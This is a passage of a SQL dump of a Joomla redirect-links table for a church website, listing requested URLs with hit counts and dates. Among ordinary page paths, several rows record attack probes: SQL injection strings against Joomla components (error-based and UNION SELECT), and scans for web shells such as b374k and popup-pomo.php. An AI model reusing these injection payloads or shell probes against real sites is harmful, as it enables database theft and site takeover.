(6221, 'https://lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles', NULL, '', '', 1, 0, '2017-08-20 14:52:47', '0000-00-00 00:00:00', 301),
(6222, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/5-dark-side-of-the-anointing-3', NULL, '', '', 6, 0, '2017-08-20 17:03:36', '0000-00-00 00:00:00', 301),
(6223, 'https://lifeoasisinternationalchurch.org/index.php/269-day-9-of-21-days-fasting-and-prayer-november', NULL, '', '', 10, 0, '2017-08-20 19:31:12', '0000-00-00 00:00:00', 301),
(6224, 'https://lifeoasisinternationalchurch.org/index.php/259-day-13-of-21-days-fasting-and-prayer-october', NULL, '', '', 4, 0, '2017-08-21 04:57:21', '0000-00-00 00:00:00', 301),
(6225, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/19-prayer-a-fasting-day-11', NULL, '', '', 16, 0, '2017-08-21 07:52:42', '0000-00-00 00:00:00', 301),
(6226, 'https://142.4.21.132/index.php?option=com_twitchtv&view=twitch&username=gobgg\'++and(/*!22223select*/+0x30783331+/*!22223from*/+(/*!22223select*/+count(*),/*!22223concat*/((select(select+/*!22223concat*/(cast(database()+as+char),0x7e,0x76756c5f6c6576656c))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+\'\'=\'', NULL, '', '', 2, 0, '2017-08-21 10:12:34', '0000-00-00 00:00:00', 301),
(6227, 'https://lifeoasisinternationalchurch.org/googleef77c14c8fc12a5b.html', NULL, '', '', 26, 0, '2017-08-21 11:20:48', '0000-00-00 00:00:00', 301),
(6228, 'https://142.4.21.132/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680\'', NULL, '', '', 2, 0, '2017-08-21 13:04:50', '0000-00-00 00:00:00', 301),
(6229, 'https://www.lifeoasisinternationalchurch.org/resources/streaming-registered', NULL, 'https://www.lifeoasisinternationalchurch.org/resources/streaming-registered', '', 42, 0, '2017-08-21 13:13:30', '0000-00-00 00:00:00', 301),
(6230, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/48-prayer-a-fasting-day-37', NULL, '', '', 16, 0, '2017-08-21 14:52:17', '0000-00-00 00:00:00', 301),
(6231, 'https://lifeoasisinternationalchurch.org/index.php/223-2016-day-6', NULL, '', '', 14, 0, '2017-08-21 17:46:27', '0000-00-00 00:00:00', 301),
(6232, 'https://prayer.lifeoasisinternationalchurch.org/t', NULL, '', '', 2, 0, '2017-08-21 19:11:06', '0000-00-00 00:00:00', 301),
(6233, 'https://www.lifeoasisinternationalchurch.org/template-info-2/our-belief', NULL, '', '', 11, 0, '2017-08-21 20:47:33', '0000-00-00 00:00:00', 301),
(6234, 'https://lifeoasisinternationalchurch.org/index.html', NULL, '', '', 19, 0, '2017-08-21 21:46:45', '0000-00-00 00:00:00', 301),
(6235, 'https://lifeoasisinternationalchurch.org/index.php/248-day-12-of-21-days-fasting-and-prayer-october', NULL, '', '', 10, 0, '2017-08-22 06:41:53', '0000-00-00 00:00:00', 301),
(6236, 'https://lifeoasisinternationalchurch.org/template-info/music-2', NULL, '', '', 18, 0, '2017-08-22 07:29:36', '0000-00-00 00:00:00', 301),
(6237, 'https://www.lifeoasisinternationalchurch.org/cont', NULL, '', '', 1, 0, '2017-08-22 08:20:33', '0000-00-00 00:00:00', 301),
(6238, 'https://lifeoasisinternationalchurch.org/template-info/media-outreach', NULL, '', '', 19, 0, '2017-08-22 12:59:13', '0000-00-00 00:00:00', 301),
(6239, 'https://lifeoasisinternationalchurch.org/database.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-08-22 14:37:47', '0000-00-00 00:00:00', 301),
(6240, 'https://lifeoasisinternationalchurch.org/assets/b374k-2.8.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-08-22 15:12:52', '0000-00-00 00:00:00', 301),
(6241, 'https://lifeoasisinternationalchurch.org/feed/', NULL, 'https://lifeoasisinternationalchurch.org/feed/', '', 33, 0, '2017-08-22 16:36:46', '0000-00-00 00:00:00', 301),
(6242, 'https://lifeoasisinternationalchurch.org/sreaming', NULL, '', '', 11, 0, '2017-08-22 17:01:36', '0000-00-00 00:00:00', 301),
(6243, 'https://www.lifeoasisinternationalchurch.org/resources/podcast', NULL, '', '', 7, 0, '2017-08-22 19:19:06', '0000-00-00 00:00:00', 301),
(6244, 'https://www.lifeoasisinternationalchurch.org/index.php/205-2015-day-31', NULL, '', '', 16, 0, '2017-08-23 00:45:41', '0000-00-00 00:00:00', 301),
(6245, 'https://www.lifeoasisinternationalchurch.org/index.php/201-2015-day-26', NULL, '', '', 14, 0, '2017-08-23 00:46:03', '0000-00-00 00:00:00', 301),
(6246, 'https://www.lifeoasisinternationalchurch.org/index.php/189-2015-day-12', NULL, '', '', 14, 0, '2017-08-23 00:46:17', '0000-00-00 00:00:00', 301),
(6247, 'https://www.lifeoasisinternationalchurch.org/index.php/132-prayer-focus-for-day-8', NULL, '', '', 12, 0, '2017-08-23 00:46:45', '0000-00-00 00:00:00', 301),
(6248, 'https://www.lifeoasisinternationalchurch.org/index.php/243-day-5-of-21-days-fasting-and-prayer-october', NULL, '', '', 26, 0, '2017-08-23 00:46:55', '0000-00-00 00:00:00', 301),
(6249, 'https://www.lifeoasisinternationalchurch.org/index.php/244-day-6-of-21-days-fasting-and-prayer-october', NULL, '', '', 29, 0, '2017-08-23 00:47:02', '0000-00-00 00:00:00', 301),
(6250, 'https://www.lifeoasisinternationalchurch.org/index.php/242-day-4-of-21-days-fasting-and-prayer-october', NULL, '', '', 30, 0, '2017-08-23 00:47:09', '0000-00-00 00:00:00', 301),
(6251, 'https://www.lifeoasisinternationalchurch.org/index.php/248-day-12-of-21-days-fasting-and-prayer-october', NULL, '', '', 27, 0, '2017-08-23 00:47:18', '0000-00-00 00:00:00', 301),
(6252, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/14-entering-into-winning-position-2', NULL, '', '', 7, 0, '2017-08-23 07:11:07', '0000-00-00 00:00:00', 301),
(6253, 'https://www.lifeoasisinternationalchurch.org/stream', NULL, '', '', 32, 0, '2017-08-23 15:22:22', '0000-00-00 00:00:00', 301),
(6254, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/7-enemies-of-gods-word-1', NULL, '', '', 62, 0, '2017-08-23 17:48:33', '0000-00-00 00:00:00', 301),
(6255, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_user&task=register', NULL, '', '', 33, 0, '2017-08-24 05:35:00', '0000-00-00 00:00:00', 301),
(6256, 'https://www.lifeoasisinternationalchurch.org/index.php/joomla/other-components/registration-form', NULL, '', '', 32, 0, '2017-08-24 05:35:02', '0000-00-00 00:00:00', 301),
(6257, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_community&view=register', NULL, '', '', 33, 0, '2017-08-24 05:35:07', '0000-00-00 00:00:00', 301),
(6258, 'https://www.lifeoasisinternationalchurch.org/index.php/component/user/register.html', NULL, '', '', 32, 0, '2017-08-24 05:35:09', '0000-00-00 00:00:00', 301),
(6259, 'https://www.lifeoasisinternationalchurch.org/index.php/registration/registers', NULL, '', '', 32, 0, '2017-08-24 05:35:11', '0000-00-00 00:00:00', 301),
(6260, 'https://www.lifeoasisinternationalchurch.org/registratsiya/registers', NULL, '', '', 32, 0, '2017-08-24 05:35:12', '0000-00-00 00:00:00', 301),
(6261, 'https://www.lifeoasisinternationalchurch.org/component/comprofiler/registers.html', NULL, '', '', 33, 0, '2017-08-24 05:35:14', '0000-00-00 00:00:00', 301),
(6262, 'https://www.lifeoasisinternationalchurch.org/user/registration', NULL, '', '', 32, 0, '2017-08-24 05:35:16', '0000-00-00 00:00:00', 301),
(6263, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_secureregistration&task=register', NULL, '', '', 32, 0, '2017-08-24 05:35:18', '0000-00-00 00:00:00', 301),
(6264, 'https://www.lifeoasisinternationalchurch.org/component/option,com_comprofiler/task,registers/', NULL, '', '', 31, 0, '2017-08-24 05:35:21', '0000-00-00 00:00:00', 301),
(6265, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_registration&task=register', NULL, '', '', 31, 0, '2017-08-24 05:35:23', '0000-00-00 00:00:00', 301),
(6266, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_comprofiler&task=registers', NULL, '', '', 75, 0, '2017-08-24 05:35:25', '0000-00-00 00:00:00', 301),
(6267, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_joocm&view=register', NULL, '', '', 31, 0, '2017-08-24 05:35:28', '0000-00-00 00:00:00', 301),
(6268, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_easysocial&view=registration', NULL, '', '', 55, 0, '2017-08-24 05:35:30', '0000-00-00 00:00:00', 301),
(6269, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_easybookreloaded', NULL, '', '', 13, 0, '2017-08-24 05:35:34', '0000-00-00 00:00:00', 301),
(6270, 'https://www.lifeoasisinternationalchurch.org/index.php/gaestebuch/', NULL, '', '', 13, 0, '2017-08-24 05:35:36', '0000-00-00 00:00:00', 301),
(6271, 'https://www.lifeoasisinternationalchurch.org/gaestebuch', NULL, '', '', 13, 0, '2017-08-24 05:35:37', '0000-00-00 00:00:00', 301),
(6272, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_easygb', NULL, '', '', 13, 0, '2017-08-24 05:35:39', '0000-00-00 00:00:00', 301),
(6273, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_akobook', NULL, '', '', 13, 0, '2017-08-24 05:35:41', '0000-00-00 00:00:00', 301),
(6274, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_vitabook', NULL, '', '', 13, 0, '2017-08-24 05:35:43', '0000-00-00 00:00:00', 301),
(6275, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_jambook', NULL, '', '', 13, 0, '2017-08-24 05:35:45', '0000-00-00 00:00:00', 301),
(6276, 'https://www.lifeoasisinternationalchurch.org/component/jambook/', NULL, '', '', 13, 0, '2017-08-24 05:35:46', '0000-00-00 00:00:00', 301),
(6277, 'https://www.lifeoasisinternationalchurch.org/index.php/component/jambook/', NULL, '', '', 13, 0, '2017-08-24 05:35:48', '0000-00-00 00:00:00', 301),
(6278, 'https://www.lifeoasisinternationalchurch.org/guestbook/', NULL, '', '', 11, 0, '2017-08-24 05:35:49', '0000-00-00 00:00:00', 301),
(6279, 'https://www.lifeoasisinternationalchurch.org/index.php/guestbook/', NULL, '', '', 22, 0, '2017-08-24 05:35:51', '0000-00-00 00:00:00', 301),
(6280, 'https://www.lifeoasisinternationalchurch.org/index.php/gaestebuch', NULL, '', '', 11, 0, '2017-08-24 05:35:53', '0000-00-00 00:00:00', 301),
(6281, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_phocaguestbook&id=1', NULL, '', '', 11, 0, '2017-08-24 05:35:56', '0000-00-00 00:00:00', 301),
(6282, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_phocaguestbook', NULL, '', '', 11, 0, '2017-08-24 05:35:57', '0000-00-00 00:00:00', 301),
(6283, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/44-prayer-a-fasting-day-35', NULL, '', '', 2, 0, '2017-08-24 12:16:04', '0000-00-00 00:00:00', 301),
(6284, 'https://142.4.21.132/index.php?option=com_zcalendar&view=plugin&name=rsvp&task=rsvpform&user=&eid=1++and(/*!00000select*/+0x30783331+/*!00000from*/+(/*!00000select*/+count(*),/*!00000concat*/((select(select+/*!00000concat*/(cast(database()+as+char),0x7e,0x496873616e53656e63616e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)&format=raw', NULL, '', '', 2, 0, '2017-08-24 14:19:08', '0000-00-00 00:00:00', 301),
(6285, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/15-entering-into-winning-position-3?layout=popup&tmpl=component', NULL, '', '', 3, 0, '2017-08-24 14:51:46', '0000-00-00 00:00:00', 301),
(6286, 'https://lifeoasisinternationalchurch.org/wow2017administrator', NULL, '', '', 4, 0, '2017-08-24 15:08:42', '0000-00-00 00:00:00', 301),
(6287, 'https://lifeoasisinternationalchurch.org/index.php/261-day-1-of-21-days-fasting-and-prayer-november', NULL, '', '', 12, 0, '2017-08-24 16:53:07', '0000-00-00 00:00:00', 301),
(6288, 'https://lifeoasisinternationalchurch.org/template-info-2/rev-oyenike-areogun', NULL, '', '', 15, 0, '2017-08-24 17:49:28', '0000-00-00 00:00:00', 301),
(6289, 'https://lifeoasisinternationalchurch.org/joomla/media/thumbsj3tmp/img.resize.php', NULL, 'lifeoasisinternationalchurch.org', '', 11, 0, '2017-08-24 17:49:47', '0000-00-00 00:00:00', 301),
(6290, 'https://lifeoasisinternationalchurch.org/logs/thumbsj3tmp/img.resize.php', NULL, 'lifeoasisinternationalchurch.org', '', 21, 0, '2017-08-24 17:50:21', '0000-00-00 00:00:00', 301),
(6291, 'https://lifeoasisinternationalchurch.org/media/thumbsj3tmp/img.resize.php', NULL, 'lifeoasisinternationalchurch.org', '', 21, 0, '2017-08-24 17:57:31', '0000-00-00 00:00:00', 301),
(6292, 'https://lifeoasisinternationalchurch.org/language/thumbsj3tmp/img.resize.php', NULL, 'lifeoasisinternationalchurch.org', '', 12, 0, '2017-08-24 18:02:21', '0000-00-00 00:00:00', 301),
(6293, 'https://www.lifeoasisinternationalchurch.org/strea', NULL, '', '', 35, 0, '2017-08-24 19:25:23', '0000-00-00 00:00:00', 301),
(6294, 'https://lifeoasisinternationalchurch.org/index.php/finance-convention-online-registration', NULL, '', '', 24, 0, '2017-08-25 00:33:02', '0000-00-00 00:00:00', 301),
(6295, 'https://lifeoasisinternationalchurch.org/2012-11-09-09-57-10/father-s-heart', NULL, '', '', 12, 0, '2017-08-25 00:33:54', '0000-00-00 00:00:00', 301),
(6296, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/popup?tmpl=component', NULL, '', '', 20, 0, '2017-08-25 04:54:40', '0000-00-00 00:00:00', 301),
(6297, 'https://lifeoasisinternationalchurch.org/live-streaming', NULL, '', '', 33, 0, '2017-08-25 06:02:15', '0000-00-00 00:00:00', 301),
(6298, 'https://lifeoasisinternationalchurch.org/wow2017', NULL, '', '', 71, 0, '2017-08-25 06:45:15', '0000-00-00 00:00:00', 301),
(6299, 'https://lifeoasisinternationalchurch.org/wow2017/streaming', NULL, '', '', 1, 0, '2017-08-25 09:33:28', '0000-00-00 00:00:00', 301),
(6300, 'https://www.lifeoasisinternationalchurch.org/payment', NULL, '', '', 43, 0, '2017-08-25 17:43:50', '0000-00-00 00:00:00', 301),
(6301, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correct', NULL, '', '', 2, 0, '2017-08-25 19:50:32', '0000-00-00 00:00:00', 301),
(6302, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy', NULL, '', '', 2, 0, '2017-08-25 19:50:32', '0000-00-00 00:00:00', 301),
(6303, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/last', NULL, '', '', 2, 0, '2017-08-25 19:50:32', '0000-00-00 00:00:00', 301),
(6304, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/pregnant', NULL, '', '', 2, 0, '2017-08-25 19:50:32', '0000-00-00 00:00:00', 301),
(6305, 'https://shop.lifeoasisinternationalchurch.org/t', NULL, '', '', 2, 0, '2017-08-25 19:56:40', '0000-00-00 00:00:00', 301),
(6306, 'https://lifeoasisinternationalchurch.org/joomla-extends.php', NULL, 'http://lifeoasisinternationalchurch.org/joomla-extends.php', '', 2, 0, '2017-08-26 05:40:51', '0000-00-00 00:00:00', 301),
(6307, 'https://www.lifeoasisinternationalchurch.org/template-info-2/rev-oyenike-areogun', NULL, '', '', 7, 0, '2017-08-26 13:00:30', '0000-00-00 00:00:00', 301),
(6308, 'https://lifeoasisinternationalchurch.org/mp3-messages/serie/1?start=20', NULL, '', '', 2, 0, '2017-08-26 14:30:35', '0000-00-00 00:00:00', 301),
(6309, 'https://www.spiritmeat.net/t', NULL, '', '', 3, 0, '2017-08-26 20:28:50', '0000-00-00 00:00:00', 301),
(6310, 'https://lifeoasisinternationalchurch.org/resources/baptism', NULL, '', '', 36, 0, '2017-08-27 04:31:26', '0000-00-00 00:00:00', 301),
(6311, 'https://lifeoasisinternationalchurch.org/index.php/template-info/outreach', NULL, '', '', 24, 0, '2017-08-27 07:23:30', '0000-00-00 00:00:00', 301),
(6312, 'https://www.lifeoasisinternationalchurch.org/ssyoutube', NULL, '', '', 1, 0, '2017-08-27 09:29:52', '0000-00-00 00:00:00', 301),
(6313, 'https://lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/53-testing', NULL, '', '', 2, 0, '2017-08-27 09:49:44', '0000-00-00 00:00:00', 301),
(6314, 'https://lifeoasisinternationalchurch.org/lstreamingg', NULL, '', '', 1, 0, '2017-08-27 10:25:17', '0000-00-00 00:00:00', 301),
(6315, 'https://lifeoasisinternationalchurch.org/index.php/253-day-16-of-21-days-fasting-and-prayer-october-3', NULL, '', '', 7, 0, '2017-08-27 10:35:06', '0000-00-00 00:00:00', 301),
(6316, 'https://lifeoasisinternationalchurch.org/streamingl', NULL, '', '', 1, 0, '2017-08-27 11:29:52', '0000-00-00 00:00:00', 301),
(6317, 'https://lifeoasisinternationalchurch.org/template-info-2/our-belief', NULL, '', '', 13, 0, '2017-08-27 12:58:30', '0000-00-00 00:00:00', 301),
(6318, 'https://lifeoasisinternationalchurch.org/network/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/network/popup-pomo.php', '', 13, 0, '2017-08-27 16:41:56', '0000-00-00 00:00:00', 301),
(6319, 'https://lifeoasisinternationalchurch.org/stylesa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/stylesa/popup-pomo.php', '', 8, 0, '2017-08-27 17:26:55', '0000-00-00 00:00:00', 301),
(6320, 'https://lifeoasisinternationalchurch.org/fascina/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/fascina/popup-pomo.php', '', 9, 0, '2017-08-27 18:46:20', '0000-00-00 00:00:00', 301),
(6321, 'https://lifeoasisinternationalchurch.org/ekomi/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/ekomi/popup-pomo.php', '', 6, 0, '2017-08-27 18:47:59', '0000-00-00 00:00:00', 301),
(6322, 'https://lifeoasisinternationalchurch.org/term/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/term/popup-pomo.php', '', 11, 0, '2017-08-27 19:13:11', '0000-00-00 00:00:00', 301),
(6323, 'https://lifeoasisinternationalchurch.org/phpmaila/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/phpmaila/popup-pomo.php', '', 2, 0, '2017-08-27 19:40:00', '0000-00-00 00:00:00', 301),
(6324, 'https://lifeoasisinternationalchurch.org/index.php/gallery', NULL, '', '', 19, 0, '2017-08-27 20:54:28', '0000-00-00 00:00:00', 301),
(6325, 'https://lifeoasisinternationalchurch.org/paypal/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/paypal/popup-pomo.php', '', 11, 0, '2017-08-27 20:56:03', '0000-00-00 00:00:00', 301),
(6326, 'https://lifeoasisinternationalchurch.org/themes/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/themes/popup-pomo.php', '', 8, 0, '2017-08-27 21:06:05', '0000-00-00 00:00:00', 301),
(6327, 'https://lifeoasisinternationalchurch.org/menus/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/menus/popup-pomo.php', '', 10, 0, '2017-08-27 21:19:15', '0000-00-00 00:00:00', 301),
(6328, 'https://lifeoasisinternationalchurch.org/scripts/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/scripts/popup-pomo.php', '', 13, 0, '2017-08-27 21:21:54', '0000-00-00 00:00:00', 301),
(6329, 'https://lifeoasisinternationalchurch.org/statslive/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/statslive/popup-pomo.php', '', 1, 0, '2017-08-27 23:05:34', '0000-00-00 00:00:00', 301),
(6330, 'https://lifeoasisinternationalchurch.org/index.php?option=com_user&task=register', NULL, '', '', 18, 0, '2017-08-27 23:17:12', '0000-00-00 00:00:00', 301),
(6331, 'https://lifeoasisinternationalchurch.org/installa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/installa/popup-pomo.php', '', 8, 0, '2017-08-27 23:30:00', '0000-00-00 00:00:00', 301),
(6332, 'https://lifeoasisinternationalchurch.org/gcheckout/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/gcheckout/popup-pomo.php', '', 4, 0, '2017-08-28 00:03:18', '0000-00-00 00:00:00', 301),
(6333, 'https://lifeoasisinternationalchurch.org/entful/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/entful/popup-pomo.php', '', 7, 0, '2017-08-28 00:23:38', '0000-00-00 00:00:00', 301),
(6334, 'https://lifeoasisinternationalchurch.org/iadvize/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/iadvize/popup-pomo.php', '', 4, 0, '2017-08-28 00:45:29', '0000-00-00 00:00:00', 301),
(6335, 'https://www.lifeoasisinternationalchurch.org/about-us/rev-oyenike-areogun', NULL, '', '', 60, 0, '2017-08-28 01:52:45', '0000-00-00 00:00:00', 301),
(6336, 'https://www.lifeoasisinternationalchurch.org/loic/testimonies.php', NULL, '', '', 2, 0, '2017-08-28 01:53:52', '0000-00-00 00:00:00', 301),
(6337, 'https://lifeoasisinternationalchurch.org/permalinka/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/permalinka/popup-pomo.php', '', 5, 0, '2017-08-28 02:31:48', '0000-00-00 00:00:00', 301),
(6338, 'https://lifeoasisinternationalchurch.org/optionsa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/optionsa/popup-pomo.php', '', 6, 0, '2017-08-28 03:14:10', '0000-00-00 00:00:00', 301),
(6339, 'https://lifeoasisinternationalchurch.org/styles/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/styles/popup-pomo.php', '', 6, 0, '2017-08-28 03:59:48', '0000-00-00 00:00:00', 301),
(6340, 'https://lifeoasisinternationalchurch.org/homefeatured/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/homefeatured/popup-pomo.php', '', 2, 0, '2017-08-28 04:51:11', '0000-00-00 00:00:00', 301),
(6341, 'https://lifeoasisinternationalchurch.org/widgets/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/widgets/popup-pomo.php', '', 15, 0, '2017-08-28 05:29:33', '0000-00-00 00:00:00', 301),
(6342, 'https://www.lifeoasisinternationalchurch.org/music.lifeoasisinternationalchurch.org/', NULL, '', '', 12, 0, '2017-08-28 05:44:07', '0000-00-00 00:00:00', 301),
(6343, 'https://lifeoasisinternationalchurch.org/options/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/options/popup-pomo.php', '', 11, 0, '2017-08-28 06:04:33', '0000-00-00 00:00:00', 301),
(6344, 'https://lifeoasisinternationalchurch.org/profilea/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/profilea/popup-pomo.php', '', 4, 0, '2017-08-28 08:22:39', '0000-00-00 00:00:00', 301),
(6345, 'https://lifeoasisinternationalchurch.org/discussion/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/discussion/popup-pomo.php', '', 14, 0, '2017-08-28 08:36:48', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(6346, 'https://lifeoasisinternationalchurch.org/canadapost/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/canadapost/popup-pomo.php', '', 4, 0, '2017-08-28 09:12:18', '0000-00-00 00:00:00', 301),
(6347, 'https://lifeoasisinternationalchurch.org/wow', NULL, '', '', 1, 0, '2017-08-28 10:43:54', '0000-00-00 00:00:00', 301),
(6348, 'https://142.4.21.132/index.php/?option=com_niceajaxpoll&getpliseid=-6725 union all select 94,94,concat(0x71626a7671,0x5759706d737349577448575a6f5553684e4d4b70506a4b436f785a78677557674267524475744468,0x71766b6271),94', NULL, '', '', 3, 0, '2017-08-28 13:26:22', '0000-00-00 00:00:00', 301),
(6349, 'https://lifeoasisinternationalchurch.org/index.php/273-day-13-of-21-days-fasting-and-prayer-november', NULL, '', '', 10, 0, '2017-08-28 14:13:37', '0000-00-00 00:00:00', 301),
(6350, 'https://www.lifeoasisinternationalchurch.org/resources/2013-gobc-online-registration', NULL, '', '', 14, 0, '2017-08-28 15:05:56', '0000-00-00 00:00:00', 301),
(6351, 'https://www.lifeoasisinternationalchurch.org/pastoral', NULL, '', '', 1, 0, '2017-08-28 21:11:09', '0000-00-00 00:00:00', 301),
(6352, 'https://lifeoasisinternationalchurch.org/trainingg', NULL, '', '', 1, 0, '2017-08-28 21:32:14', '0000-00-00 00:00:00', 301),
(6353, 'https://lifeoasisinternationalchurch.org/?option=com_user&view=register', NULL, '', '', 1, 0, '2017-08-29 05:05:21', '0000-00-00 00:00:00', 301),
(6354, 'https://lifeoasisinternationalchurch.org/index.php/275-day-15-of-21-days-fasting-and-prayer-november', NULL, '', '', 13, 0, '2017-08-29 05:42:05', '0000-00-00 00:00:00', 301),
(6355, 'https://www.lifeoasisinternationalchurch.org/modules/mod_defender/tmpl/template.php', NULL, 'http://www.lifeoasisinternationalchurch.org/modules/mod_defender/tmpl/template.php', '', 1, 0, '2017-08-29 10:33:39', '0000-00-00 00:00:00', 301),
(6356, 'https://lifeoasisinternationalchurch.org/modules/mod_defender/tmpl/template.php', NULL, 'http://lifeoasisinternationalchurch.org/modules/mod_defender/tmpl/template.php', '', 1, 0, '2017-08-29 10:35:21', '0000-00-00 00:00:00', 301),
(6357, 'https://lifeoasisinternationalchurch.org/custom-post.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-08-29 12:33:42', '0000-00-00 00:00:00', 301),
(6358, 'https://lifeoasisinternationalchurch.org/wp-custom.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-08-29 12:34:11', '0000-00-00 00:00:00', 301),
(6359, 'https://lifeoasisinternationalchurch.org/customizer.php', NULL, 'lifeoasisinternationalchurch.org', '', 6, 0, '2017-08-29 12:36:51', '0000-00-00 00:00:00', 301),
(6360, 'https://www.lifeoasisinternationalchurch.org/loic/globalintercessorynetwork.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/globalintercessorynetwork.php', '', 8, 0, '2017-08-30 03:13:55', '0000-00-00 00:00:00', 301),
(6361, 'https://www.lifeoasisinternationalchurch.org/loic/ourbelieve.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/ourbelieve.php', '', 22, 0, '2017-08-30 06:23:36', '0000-00-00 00:00:00', 301),
(6362, 'https://lifeoasisinternationalchurch.org/template-info-2/our-service-schedule', NULL, '', '', 13, 0, '2017-08-30 13:27:24', '0000-00-00 00:00:00', 301),
(6363, 'https://lifeoasisinternationalchurch.org/resources/seminar', NULL, '', '', 14, 0, '2017-08-30 14:27:52', '0000-00-00 00:00:00', 301),
(6364, 'https://www.lifeoasisinternationalchurch.org/loic/outreach.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/outreach.php', '', 23, 0, '2017-08-30 14:31:06', '0000-00-00 00:00:00', 301),
(6365, 'https://lifeoasisinternationalchurch.org/template-info/mimmp', NULL, '', '', 20, 0, '2017-08-30 15:28:12', '0000-00-00 00:00:00', 301),
(6366, 'https://lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/father-s-heart', NULL, '', '', 85, 0, '2017-08-30 16:27:51', '0000-00-00 00:00:00', 301),
(6367, 'https://lifeoasisinternationalchurch.org/index.php/18-wifi-zion/33-wifizion-aims-objectives', NULL, '', '', 17, 0, '2017-08-30 17:31:40', '0000-00-00 00:00:00', 301),
(6368, 'https://www.lifeoasisinternationalchurch.org/online-giving/gtpay', NULL, 'http://www.lifeoasisinternationalchurch.org/online-giving/gtpay', '', 36, 0, '2017-08-30 17:39:46', '0000-00-00 00:00:00', 301),
(6369, 'https://www.lifeoasisinternationalchurch.org/loic/groups.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/groups.php', '', 9, 0, '2017-08-30 20:46:35', '0000-00-00 00:00:00', 301),
(6370, 'https://www.lifeoasisinternationalchurch.org/loic/tracts.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/tracts.php', '', 24, 0, '2017-08-30 20:48:10', '0000-00-00 00:00:00', 301),
(6371, 'https://www.lifeoasisinternationalchurch.org/devotional/', NULL, '', '', 20, 0, '2017-08-31 03:02:19', '0000-00-00 00:00:00', 301),
(6372, 'https://www.lifeoasisinternationalchurch.org/loic/newsletter.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/newsletter.php', '', 12, 0, '2017-08-31 06:28:55', '0000-00-00 00:00:00', 301),
(6373, 'https://www.lifeoasisinternationalchurch.org/loic/sermons.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/sermons.php', '', 15, 0, '2017-08-31 09:46:37', '0000-00-00 00:00:00', 301),
(6374, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/dream-centre-ordained-pastors', NULL, '', '', 30, 0, '2017-08-31 10:52:30', '0000-00-00 00:00:00', 301),
